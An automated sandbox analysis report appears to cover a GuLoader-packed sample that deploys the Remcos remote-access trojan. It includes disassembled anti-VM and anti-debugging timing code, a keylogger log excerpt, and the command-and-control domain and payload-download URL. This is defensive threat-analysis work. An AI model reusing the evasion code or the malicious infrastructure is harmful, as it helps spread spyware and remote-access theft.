Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	RDTSC instruction interceptor: First address: 0000000000567CB5 second address: 0000000000567CB5 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 8D6257E7h 0x00000007 xor eax, D6E50CE5h 0x0000000c xor eax, CD304DCCh 0x00000011 add eax, 6948E933h 0x00000016 cpuid 0x00000018 popad 0x00000019 call 00007FB8B03662D3h 0x0000001e lfence 0x00000021 mov edx, 617AD252h 0x00000026 xor edx, 84973C64h 0x0000002c xor edx, 903C3D1Eh 0x00000032 xor edx, 0A2FD33Ch 0x00000038 mov edx, dword ptr [edx] 0x0000003a lfence 0x0000003d cmp edx, 53D52FB7h 0x00000043 cmp ah, ch 0x00000045 test cl, bl 0x00000047 ret 0x00000048 jmp 00007FB8B03662C9h 0x0000004d cmp ch, dh 0x0000004f sub edx, esi 0x00000051 ret 0x00000052 add edi, edx 0x00000054 dec dword ptr [ebp+000000F8h] 0x0000005a cmp dword ptr [ebp+000000F8h], 00000000h 0x00000061 jne 00007FB8B03661CCh 0x00000063 call 00007FB8B0366227h 0x00000068 call 00007FB8B03662F4h 0x0000006d lfence 0x00000070 mov edx, 617AD252h 0x00000075 xor edx, 84973C64h 0x0000007b xor edx, 903C3D1Eh 0x00000081 xor edx, 0A2FD33Ch 0x00000087 mov edx, dword ptr [edx] 0x00000089 lfence 0x0000008c cmp edx, 53D52FB7h 0x00000092 cmp ah, ch 0x00000094 test cl, bl 0x00000096 ret 0x00000097 mov esi, edx 0x00000099 pushad 0x0000009a rdtsc
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	RDTSC instruction interceptor: First address: 0000000000567DF9 second address: 0000000000567DF9 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, DDFE68D6h 0x00000013 xor eax, 51E6CF38h 0x00000018 sub eax, D694E780h 0x0000001d xor eax, B583C06Fh 0x00000022 cpuid 0x00000024 bt ecx, 1Fh 0x00000028 jc 00007FB8B0E656E2h 0x0000002e popad 0x0000002f call 00007FB8B0E65261h 0x00000034 lfence 0x00000037 rdtsc
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	RDTSC instruction interceptor: First address: 0000000000561C79 second address: 0000000000561C79 instructions:
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	RDTSC instruction interceptor: First address: 000000000056322B second address: 000000000056326F instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a xor dword ptr [ebp+14h], AA1EA117h 0x00000011 add dword ptr [ebp+14h], 28368260h 0x00000018 mov dword ptr [ebp+00000277h], esi 0x0000001e mov esi, C4615DA9h 0x00000023 test ebx, 3C315E73h 0x00000029 xor esi, 49D529C1h 0x0000002f xor esi, F48EAD89h 0x00000035 test ch, FFFFFF8Ch 0x00000038 sub esi, 793AD9E1h 0x0000003e pushad 0x0000003f mov ecx, 000000B7h 0x00000044 rdtsc
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	RDTSC instruction interceptor: First address: 000000000056326F second address: 00000000005632FA instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 cmp dword ptr [edi+00000814h], esi 0x00000009 mov esi, dword ptr [ebp+00000277h] 0x0000000f je 00007FB8B03663A8h 0x00000015 mov dword ptr [ebp+000001C9h], eax 0x0000001b mov eax, ecx 0x0000001d push eax 0x0000001e mov eax, dword ptr [ebp+000001C9h] 0x00000024 mov esi, dword ptr [edi+00000814h] 0x0000002a mov eax, dword ptr [edi+00000800h] 0x00000030 add eax, esi 0x00000032 add eax, ecx 0x00000034 test dh, dh 0x00000036 mov dword ptr [ebp+000001A6h], eax 0x0000003c mov eax, EC4E9022h 0x00000041 xor eax, 74E0F7A3h 0x00000046 xor eax, 4B60BED9h 0x0000004b sub eax, D3CED944h 0x00000050 cmp bh, 00000033h 0x00000053 push eax 0x00000054 mov eax, dword ptr [ebp+000001A6h] 0x0000005a mov dword ptr [ebp+0000018Fh], edx 0x00000060 mov edx, eax 0x00000062 push edx 0x00000063 mov edx, dword ptr [ebp+0000018Fh] 0x00000069 cmp ah, ch 0x0000006b mov ebx, edi 0x0000006d add ebx, 00000C00h 0x00000073 mov dword ptr [ebp+00000273h], ecx 0x00000079 mov ecx, ebx 0x0000007b cmp dl, al 0x0000007d push ecx 0x0000007e mov ecx, dword ptr [ebp+00000273h] 0x00000084 cmp dh, FFFFFFD7h 0x00000087 pushad 0x00000088 lfence 0x0000008b rdtsc
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	RDTSC instruction interceptor: First address: 0000000000563DB3 second address: 0000000000563DB3 instructions:

Source: C:\Users\user\Desktop\kGSHiWbgq9.exe

Code function: 1_2_020F5781 rdtsc

1_2_020F5781

Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Window / User API: threadDelayed 9165			Jump to behavior
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Window / User API: foregroundWindowGot 557			Jump to behavior

Source: C:\Users\user\Desktop\kGSHiWbgq9.exe TID: 3080	Thread sleep count: 9165 > 30			Jump to behavior
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe TID: 3080	Thread sleep time: -45825s >= -30000s			Jump to behavior

Source: C:\Users\user\Desktop\kGSHiWbgq9.exe

Thread sleep count: Count: 9165 delay: -5

Jump to behavior

Source: kGSHiWbgq9.exe, 0000000B.00000002.1727052878.00000000008A4000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAWu
Source: kGSHiWbgq9.exe, 00000001.00000002.773600997.0000000002100000.00000004.00000001.sdmp	Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32TEMP=windir=\syswow64\msvbvm60.dll
Source: kGSHiWbgq9.exe, 0000000B.00000002.1727117740.00000000008BC000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW
Source: kGSHiWbgq9.exe, 00000001.00000002.773600997.0000000002100000.00000004.00000001.sdmp	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: kGSHiWbgq9.exe, 0000000B.00000002.1726966923.0000000000878000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAWH0

Source: C:\Users\user\Desktop\kGSHiWbgq9.exe

System information queried: ModuleInformation

Jump to behavior

Anti Debugging:

Hides threads from debuggers

Show sources

Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Thread information set: HideFromDebugger	Jump to behavior

Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\kGSHiWbgq9.exe

Code function: 1_2_020F5781 rdtsc

1_2_020F5781

Source: C:\Users\user\Desktop\kGSHiWbgq9.exe

Code function: 1_2_020F6568 LdrInitializeThunk,

1_2_020F6568

Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F853B mov eax, dword ptr fs:[00000030h]	1_2_020F853B
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F73B4 mov eax, dword ptr fs:[00000030h]	1_2_020F73B4
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F3441 mov eax, dword ptr fs:[00000030h]	1_2_020F3441
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F5589 mov eax, dword ptr fs:[00000030h]	1_2_020F5589
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F3874 mov eax, dword ptr fs:[00000030h]	1_2_020F3874
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F7898 mov eax, dword ptr fs:[00000030h]	1_2_020F7898
Source: C:\Users\user\Desktop\kGSHiWbgq9.exe	Code function: 1_2_020F2D3B mov eax, dword ptr fs:[00000030h]	1_2_020F2D3B

Source: C:\Users\user\Desktop\kGSHiWbgq9.exe

Process created: C:\Users\user\Desktop\kGSHiWbgq9.exe 'C:\Users\user\Desktop\kGSHiWbgq9.exe'

Jump to behavior

Source: kGSHiWbgq9.exe, 0000000B.00000002.1727052878.00000000008A4000.00000004.00000020.sdmp	Binary or memory string: Program Managerc
Source: kGSHiWbgq9.exe, 0000000B.00000002.1727052878.00000000008A4000.00000004.00000020.sdmp	Binary or memory string: Program Manager
Source: kGSHiWbgq9.exe, 0000000B.00000002.1727276289.0000000000F00000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: kGSHiWbgq9.exe, 0000000B.00000002.1727276289.0000000000F00000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: kGSHiWbgq9.exe, 0000000B.00000002.1726966923.0000000000878000.00000004.00000020.sdmp, logs.dat.11.dr	Binary or memory string: [ Program Manager ]
Source: kGSHiWbgq9.exe, 0000000B.00000002.1727052878.00000000008A4000.00000004.00000020.sdmp	Binary or memory string: Program ManagerAZALZ\z
Source: kGSHiWbgq9.exe, 0000000B.00000002.1727052878.00000000008A4000.00000004.00000020.sdmp	Binary or memory string: Program ManagerAZALZ\q
Source: kGSHiWbgq9.exe, 0000000B.00000002.1727276289.0000000000F00000.00000002.00000001.sdmp	Binary or memory string: Progmanlock
Source: kGSHiWbgq9.exe, 0000000B.00000002.1727117740.00000000008BC000.00000004.00000020.sdmp	Binary or memory string: \|Program Manager\|
Source: kGSHiWbgq9.exe, 0000000B.00000002.1727052878.00000000008A4000.00000004.00000020.sdmp	Binary or memory string: Program ManagerAZALZ\,

Stealing of Sensitive Information:

GuLoader behavior detected

Show sources

Source: Initial file

Signature Results: GuLoader behavior

Yara detected Remcos RAT

Show sources

Source: Yara match	File source: 0000000B.00000002.1727052878.00000000008A4000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: kGSHiWbgq9.exe PID: 6636, type: MEMORYSTR

Remote Access Functionality:

Yara detected Remcos RAT

Show sources

Source: Yara match	File source: 0000000B.00000002.1727052878.00000000008A4000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: kGSHiWbgq9.exe PID: 6636, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	Path Interception	Process Injection12	Masquerading1	Input Capture11	Security Software Discovery621	Remote Services	Input Capture11	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Virtualization/Sandbox Evasion23	LSASS Memory	Virtualization/Sandbox Evasion23	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Non-Standard Port1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Process Injection12	Security Account Manager	Process Discovery1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Ingress Tool Transfer1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Obfuscated Files or Information2	NTDS	Application Window Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Non-Application Layer Protocol2	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing1	LSA Secrets	Remote System Discovery1	SSH	Keylogging	Data Transfer Size Limits	Application Layer Protocol212	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	System Information Discovery32	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
kGSHiWbgq9.exe	22%	Virustotal		Browse
kGSHiWbgq9.exe	9%	ReversingLabs	Win32.Trojan.Vebzenpak
kGSHiWbgq9.exe	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://101.99.94.119/WEALTH_PRUuqVZw139.bin	0%	Avira URL Cloud	safe
http://101.99.94.119/WEALTH_PRUu	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
wealthyrem.ddns.net	194.5.97.128	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://101.99.94.119/WEALTH_PRUuqVZw139.bin	true	Avira URL Cloud: safe	unknown
http://101.99.94.119/WEALTH_PRUu	true	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
194.5.97.128	wealthyrem.ddns.net	Netherlands		208476	DANILENKODE	true
101.99.94.119	unknown	Malaysia		45839	SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY	true

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	457930
Start date:	02.08.2021
Start time:	15:15:06
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 12m 29s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	kGSHiWbgq9.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name:	Suspected Instruction Hammering Hide Perf
Number of analysed new started processes analysed:	32
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@3/1@1/2
EGA Information:	Failed
HDC Information:	Successful, ratio: 6.3% (good quality ratio 2.7%) Quality average: 21.2% Quality standard deviation: 28.8%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, RuntimeBroker.exe, MusNotifyIcon.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 104.42.151.234, 23.211.6.115, 40.88.32.150, 204.79.197.222, 20.82.210.154, 173.222.108.210, 173.222.108.226, 20.54.110.249, 40.112.88.60, 80.67.82.235, 80.67.82.211, 40.126.31.142, 40.126.31.138, 40.126.31.3, 40.126.31.140, 20.190.159.133, 40.126.31.5, 40.126.31.7, 20.190.159.131, 51.104.136.2, 51.11.168.232 Excluded domains from analysis (whitelisted): fp.msedge.net, au.download.windowsupdate.com.edgesuite.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, www.tm.a.prd.aadg.trafficmanager.net, a-0019.a-msedge.net, e12564.dspb.akamaiedge.net, skypedataprdcoleus15.cloudapp.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, login.live.com, a-0019.standard.a-msedge.net, audownload.windowsupdate.nsatc.net, 1.perf.msedge.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, au-bg-shim.trafficmanager.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, settings-win.data.microsoft.com, a767.dscg3.akamai.net, login.msa.msidentity.com, settingsfd-geo.trafficmanager.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus16.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, www.tm.lg.prod.aadmsa.trafficmanager.net Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
194.5.97.128	loKmeabs9V.exe	Get hash	malicious	Browse
101.99.94.119	loKmeabs9V.exe	Get hash	malicious	Browse	101.99.94.119/WEALTH_PRUuqVZw139.bin

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
wealthyrem.ddns.net	loKmeabs9V.exe	Get hash	malicious	Browse	194.5.97.128

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
DANILENKODE	loKmeabs9V.exe	Get hash	malicious	Browse	194.5.97.128
	1niECmfIcE.exe	Get hash	malicious	Browse	194.5.97.94
	Nuzbcdoajgupgalxelbnohzzeonlplvuro.exe	Get hash	malicious	Browse	194.5.98.7
	RueoUfi1MZ.exe	Get hash	malicious	Browse	194.5.98.3
	Departamento de contadores Consejos de pago 0.exe	Get hash	malicious	Browse	194.5.98.7
	04_extracted.exe	Get hash	malicious	Browse	194.5.97.18
	scanorder01321.jar	Get hash	malicious	Browse	194.5.98.243
	scanorder01321.jar	Get hash	malicious	Browse	194.5.98.243
	PO.exe	Get hash	malicious	Browse	194.5.98.23
	PO B4007121.exe	Get hash	malicious	Browse	194.5.98.7
	WzOSphO1Np.exe	Get hash	malicious	Browse	194.5.98.107
	QUOTATION-007222021.exe	Get hash	malicious	Browse	194.5.97.145
	PO B4007121.exe	Get hash	malicious	Browse	194.5.98.7
	ORDER407-395.exe	Get hash	malicious	Browse	194.5.98.23
	Bank Copy.pdf.exe	Get hash	malicious	Browse	194.5.98.8
	FATURAA No.072221.exe	Get hash	malicious	Browse	194.5.98.158
	Document.1-xml.eml.exe	Get hash	malicious	Browse	194.5.98.136
	2 ( P-O DRAWINGS ) SUPPLY PRODUCT.exe	Get hash	malicious	Browse	194.5.98.212
	ynFBVCYIcu.exe	Get hash	malicious	Browse	194.5.98.195
	#RFQ ORDER7678432213211.exe	Get hash	malicious	Browse	194.5.98.120

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Roaming\remcos\logs.dat Download File
Process:	C:\Users\user\Desktop\kGSHiWbgq9.exe
File Type:	data
Category:	dropped
Size (bytes):	148
Entropy (8bit):	3.3487110381392666
Encrypted:	false
SSDEEP:	3:rklKlmvNBlfOlTfab5JWRal2Jl+7R0DAlBG4LNQblovDl9il:IlKIL8Rab5YcIeeDAlybW/G
MD5:	76573E45A0665F7B4EA43FCFAC539A41
SHA1:	4DD46EEC1D9DC9E981C0D4CF4248B1E98D1BFD90
SHA-256:	386A19E3AA88261E634D5DCBCD189211762BDCBB6C33ED74E67B259F1214748E
SHA-512:	2D21A84DC0D0AF7C315A6A616A6CD5D53EC99F6FA8259408101169D995642B258976259B70B363591F8FEB65E107E75DA8D2FA6D84E0EFC23FEA3D8856BEBBBA
Malicious:	false
Reputation:	low
Preview:	....[.2.0.2.1./.0.8./.0.2. .1.5.:.1.6.:.5.5. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[. .P.r.o.g.r.a.m. .M.a.n.a.g.e.r. .].....

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.650522833717378
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	kGSHiWbgq9.exe
File size:	114688
MD5:	27bf14807bc9d5cd2d823293f43c3a3a
SHA1:	08eeed11867aa351be0d6c48da283721ee6c0769
SHA256:	55fd5769df0df23d4140a34d07dc2c833b43ac1060f4d0992bdd27316041c69a
SHA512:	c2bcd733a0bfd1b9e56b630e4fae6a45951a843946a389f8987c48a3b047ca9b9f74a5a01afc7d7589f156691220e474553229f485b6de4f902db566a6a0d245
SSDEEP:	1536:EAPGkc1ug6GUMu+Yg2WGI5XZ4QmiPYefCGk4H:X2bUMEWfXZiea
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#...B...B...B..L^...B...`...B...d...B..Rich.B..........PE..L......K.................@..........D........P....@................

File Icon


Icon Hash:	a5b595a595a5a5b5

Static PE Info

General
Entrypoint:	0x401144
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:	0x4B801CC3 [Sat Feb 20 17:32:51 2010 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	5565993a5a9f2bfb76f28ab304be6bc1

Entrypoint Preview

Instruction
push 00406B54h
call 00007FB8B0E0BDD5h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
inc eax
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [edx-2D91E317h], bh
sub eax, dword ptr [edx+312E8C4Dh]
cmp dword ptr [ecx+00414DE0h], edi
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ebx+4Fh], al
inc ebx
dec ebx
dec esi
inc ebp
pop ecx
inc ebp
push edx
dec esi
inc ebp
push ebx
add byte ptr [ebp+73h], ch
add byte ptr [eax], al
add byte ptr [eax], al
dec esp
xor dword ptr [eax], eax
pop es
mov ebp, 63A526FFh
pushfd
inc edi
test byte ptr [eax], ah
arpl word ptr [edi-5FF889ACh], si
adc eax, B00EF4E9h
sbb edi, ecx
inc ebx
movsd
cmp byte ptr [esi], bl
insd
pop ecx
test byte ptr [eax-52B0C5E4h], 00000033h
cdq
iretw
adc dword ptr [edi+00AA000Ch], esi
pushad
rcl dword ptr [ebx+00000000h], cl
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
pop ecx
add byte ptr [eax], al
cmp byte ptr [eax+00h], bl
add byte ptr [eax], al
or eax, dword ptr [eax]
push edx
inc ebp
push esp
dec ecx
dec esi
dec ecx
push ebx
push eax
dec edi
push edx
inc ecx
add byte ptr [53000F01h], cl
push esp
inc ebp

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x14b74	0x28	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x17000	0x5b96	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x228	0x20
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x7c	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x13df4	0x14000	False	0.649157714844	data	7.07266809617	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data	0x15000	0x115c	0x1000	False	0.00634765625	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x17000	0x5b96	0x6000	False	0.545694986979	data	6.03179178254	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x1bcee	0xea8	data
RT_ICON	0x1b446	0x8a8	dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 1334943657, next used block 1336905122
RT_ICON	0x1aede	0x568	GLS_BINARY_LSB_FIRST
RT_ICON	0x18936	0x25a8	data
RT_ICON	0x1788e	0x10a8	data
RT_ICON	0x17426	0x468	GLS_BINARY_LSB_FIRST
RT_GROUP_ICON	0x173cc	0x5a	data
RT_VERSION	0x171e0	0x1ec	data	Chinese	Taiwan

Imports

DLL

Import

MSVBVM60.DLL

_CIcos, _adj_fptan, _adj_fdiv_m64, _adj_fprem1, __vbaHresultCheckObj, _adj_fdiv_m32, _adj_fdiv_m16i, _adj_fdivr_m16i, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, _adj_fpatan, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, _CIlog, __vbaErrorOverflow, _adj_fdiv_m32i, _adj_fdivr_m32i, _adj_fdivr_m32, _adj_fdiv_r, _CIatan, _allmul, _CItan, _CIexp

Version Infos

Description	Data
Translation	0x0404 0x04b0
ProductVersion	1.00
InternalName	PAAKLDENDE
FileVersion	1.00
OriginalFilename	PAAKLDENDE.exe
ProductName	CAMPHOUR

Possible Origin

Language of compilation system	Country where language is spoken	Map
Chinese	Taiwan

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 2, 2021 15:17:47.154978991 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.206289053 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.206465006 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.258721113 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.258838892 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.311050892 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.311081886 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.311098099 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.311132908 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.311139107 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.311167002 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.311192036 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.362611055 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.362638950 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.362657070 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.362673998 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.362695932 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.362715006 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.362715006 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.362735033 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.362737894 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.362752914 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.362787008 CEST	49758	80	192.168.2.4	101.99.94.119
Aug 2, 2021 15:17:47.414144039 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.414241076 CEST	80	49758	101.99.94.119	192.168.2.4
Aug 2, 2021 15:17:47.414274931 CEST	80	49758	101.99.94.119	192.168.2.4
